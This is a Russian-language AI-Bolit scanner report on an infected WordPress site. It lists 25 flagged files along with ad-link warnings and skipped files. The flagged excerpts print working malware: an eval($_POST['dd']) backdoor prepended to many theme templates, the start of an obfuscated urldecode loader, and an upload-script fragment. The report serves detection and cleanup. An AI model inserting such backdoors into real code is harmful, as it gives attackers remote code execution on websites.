Отчет сканера AI-Bolit v20160417: /home/bobylev/public_html/ (1/1)
Скрипт бесплатный только для личного некоммерческого использования. Есть коммерческая лицензия (пункт №11).
Затрачено времени: 3 m . Сканирование начато 26-09-2017 в 16:34:06, сканирование завершено 26-09-2017 в 16:37:43
Всего проверено 487 директорий и 7799 файлов. Использовано памяти при сканировании: 6.90 Mb.
Сводный отчет
Вредоносных скриптов25
Пропущенных больших файлов8
Скрытых файлов1
Рекламных ссылок и кодов2
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер старается минимизировать число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.
Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Скорее всего, ваш сайт был взломан и заражен. Рекомендуем срочно обратиться за консультацией к специалистам по информационной безопасности.

Пришлите нам отчет в архиве .zip на ai@revisium.com для проверки вашего сайта на вирусы и взлом.

Компания "Ревизиум" - лечение сайта от вирусов и защита от взлома.


Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Критические замечания
Эти файлы могут быть вредоносными или хакерскими скриптами (25)
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
[x] 1…s."|".$file;$NowQuantity=$NowQuantity+1;if($NowQuantity>=$MaxQuantity){break;}}} echo '__success__'.$NowSubFolders.'__success__';}else if($action=='UploadOne'){
03/09/2017 08:28:12
03/09/2017 08:28:12
1.81 Kb
8e6504e95ba7d10f61035c9d8044c404d22f43b8
1504427292
1504427292
id_4dca61d7
[x] 1<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GL
03/09/2017 03:51:54
03/09/2017 03:51:54
112.62 Kb
c425ba1c95f0db60d60b29e475999f9a3b0fa7aa
1504410714
1504410714
id_40bb8a67
[x] 1<?php eval($_POST['dd']);?><?php?><article id="post-<?php the_ID();?>"<?php post_clas
03/09/2017 02:03:41
03/09/2017 02:03:41
1.74 Kb
118216a308dff342b8e2bd59ca859978f95517d8
1504404221
1504404221
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><article id="post-<?php the_ID();?>"<?php post_clas
03/09/2017 02:03:52
03/09/2017 02:03:52
1.69 Kb
f27a28964d355e6523bf781b215f11dfc702976b
1504404232
1504404232
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?></div><!--.site-content --><footer id="colophon" cl
03/09/2017 02:03:54
03/09/2017 02:03:54
851 b
3e7a9cd94c82965b4b5a601c84b1dbfc7f42e90e
1504404234
1504404234
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><!DOCTYPE html><html<?php language_attributes();?>c
03/09/2017 02:04:01
03/09/2017 02:04:01
1.83 Kb
c5958ab162fb5da439d2006bbe2c7c176a49b277
1504404241
1504404241
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><article id="post-<?php the_ID();?>"<?php post_clas
03/09/2017 02:03:49
03/09/2017 02:03:49
1.10 Kb
95ccdf790d911ae97ebd672fa25788c57fdcfab9
1504404229
1504404229
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><div class="author-info"><h2 class="author-heading"
03/09/2017 02:03:34
03/09/2017 02:03:34
1.14 Kb
7a79f151770f18ce53d3c5120383e5f9b5f89200
1504404214
1504404214
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><section class="no-results not-found"><header class
03/09/2017 02:03:43
03/09/2017 02:03:43
1.17 Kb
722ce84d5f0e525392bb0a01276be833d07e3fd2
1504404223
1504404223
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><!DOCTYPE html><html<?php language_attributes();?>c
03/09/2017 02:04:54
03/09/2017 02:04:54
1.65 Kb
07fffd28d42aff5b6bc2fbe755f6e6d24d0a094e
1504404294
1504404294
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php if(! function_exists('twentyseventeen_posted_on')) :
03/09/2017 02:05:17
03/09/2017 02:05:17
6.36 Kb
62c39b0b755769fcaaca209e90d1737fb71a23d7
1504404317
1504404317
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php get_header();?><!--#Content --><div id="Content" cla
03/09/2017 02:03:11
03/09/2017 02:03:11
1.54 Kb
e2f0ed065bf81f19fd6d4d41a13484182b75bac0
1504404191
1504404191
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php$layout=mfn_opts_get('portfolio-layout','one');$item_
03/09/2017 02:02:00
03/09/2017 02:02:00
750 b
577e35de25787d8b8f4f80a1636bd0398fee9c5f
1504404120
1504404120
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php if(is_front_page()) echo '<h1>';?><a id="logo" href=
03/09/2017 02:02:11
03/09/2017 02:02:11
321 b
db002a3a4769617d929f81ec5eb30bd624b180c2
1504404131
1504404131
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><!--#Top_area --><div id="Top_area"><!--#Top_bar --><div i
03/09/2017 02:02:14
03/09/2017 02:02:14
3.47 Kb
7042ee643658f598df351070b4350b9a2aa30d4f
1504404134
1504404134
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie
03/09/2017 02:01:54
03/09/2017 02:01:54
2.46 Kb
1be4bf71e6a750fab3fffc71b016392459dfffe1
1504404114
1504404114
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie
03/09/2017 02:01:51
03/09/2017 02:01:51
2.43 Kb
429fc86aaa17ea86d4e3f369f986302849635aaa
1504404111
1504404111
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php get_header();$sidebar=mfn_sidebar_classes(get_option
03/09/2017 02:02:40
03/09/2017 02:02:40
1.27 Kb
44cc86508ecd51d547268d092735c88ed2b6f10f
1504404160
1504404160
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php if(! defined('ABSPATH')){exit;}global$product;if(emp
03/09/2017 02:03:23
03/09/2017 02:03:23
1.55 Kb
d682eeb657ca13e80440e56a6ed03b98ea21c306
1504404203
1504404203
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><!DOCTYPE html><html<?php language_attributes();?>c
03/09/2017 02:05:55
03/09/2017 02:05:55
4.08 Kb
5fd5b95b66af93e7b9ac5a26dfafc2f859951e66
1504404355
1504404355
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php if(! function_exists('twentysixteen_entry_meta')) :
03/09/2017 02:06:08
03/09/2017 02:06:08
8.01 Kb
57c99c005d14923e06b04ab261b75201fd242dcf
1504404368
1504404368
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><article id="post-<?php the_ID();?>"<?php post_clas
03/09/2017 02:06:46
03/09/2017 02:06:46
1.71 Kb
cfcafa13d696d0600d08d6b8115b7c061bcf1b8f
1504404406
1504404406
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><article id="post-<?php the_ID();?>"<?php post_clas
03/09/2017 02:06:40
03/09/2017 02:06:40
1.30 Kb
4483d6664a9265706f2816a11cd9e41e44daba4a
1504404400
1504404400
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><div class="author-info"><div class="author-avatar"
03/09/2017 02:06:31
03/09/2017 02:06:31
1.17 Kb
955c47d1188e6dc0d5f5caa48692649555cdc8bd
1504404391
1504404391
id_7b412c1e
[x] 1<?php eval($_POST['dd']);?><?php?><section class="no-results not-found"><header class
03/09/2017 02:06:34
03/09/2017 02:06:34
1.09 Kb
4a945a22ea88f7a404e089279991ff0ad715931f
1504404394
1504404394
id_7b412c1e
Предупреждения
Дорвеи, реклама, спам-ссылки, редиректы
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
1…e="border:0" width="100%" height="70px" src="<?php echo esc_url($iframe_url);?>" ></iframe><?php}?></div><?php elseif(isset($_GET['deleted'])) :$delete_result=g
20/09/2017 05:56:35
20/09/2017 05:56:35
21.70 Kb
3557d676bdc1894de797777cf0a5287bb7ae1675
1505886995
1505886995
id_z1861471
1…e="border:0" width="100%" height="70px" src="<?php echo esc_url($iframe_url);?>" ></iframe><?php}?></div><?php endif;?><div class="wrap"><h1><?php echo esc_html
20/09/2017 05:56:35
20/09/2017 05:56:35
12.08 Kb
39fd8d43e8732dac9ed868366e1f19bbd8f9295e
1505886995
1505886995
id_z8346636
Скрытые файлы (1)
/home/bobylev/public_html/.well-known
Большие файлы (больше чем 600.00 Kb). Пропущено
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
28/02/2017 16:06:46
28/02/2017 16:06:46
606.20 Kb
a294dfe02e4747ab078ac2dd58a46e7f0cad76da
1488298006
1488298006
id_z6316093
28/02/2017 16:35:40
28/02/2017 16:35:40
606.20 Kb
f114534b08f98812a801475b0bdd5d949328a044
1488299740
1488299740
id_z1961873
28/02/2017 15:57:57
28/02/2017 15:57:57
1.31 Mb
c0906fc4f141fe188c28cb7de1bc091d076edab2
1488297477
1488297477
id_z3424249
11/03/2017 15:07:39
11/03/2017 15:07:39
1.89 Mb
5d2ed73d016ebbc49582a2e4befd8d4afdff8183
1489244859
1489244859
id_z3227080
11/03/2017 15:01:15
11/03/2017 15:01:15
623.10 Kb
3dd50fab6984cde4fde4c1f753682094117a7d2d
1489244475
1489244475
id_z4178331
11/03/2017 15:01:10
11/03/2017 15:01:10
1.86 Mb
0886c745563892df01ec693ea31277ab9bed41f3
1489244470
1489244470
id_z6903848
28/02/2017 16:25:22
28/02/2017 16:25:22
6.38 Mb
e2f0ed065bf81f19fd6d4d41a13484182b75bac0
1488299122
1488299122
id_z3508074
06/07/2017 09:40:37
06/07/2017 09:40:37
802.93 Kb
363616792dd66362be377987fc3c9ab3a594cdb1
1499334037
1499334037
id_z8326907
В не .php файле содержится стартовая сигнатура PHP кода. Возможно, там вредоносный код
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
1…ze" href="<?php echo wp_customize_url();?>">Open Customizer</a>* * augments wp.c ustomize.Events */ Loader=$.extend({},api.Events,{/** * Setup the Loader;trigge
28/02/2017 14:46:22
28/02/2017 14:46:22
7.40 Kb
9d89934c59f855b0c83647791e898b3495c7fc1a
1488293182
1488293182
id_z1720164
Версии найденных CMS
Wordpress v4.8.2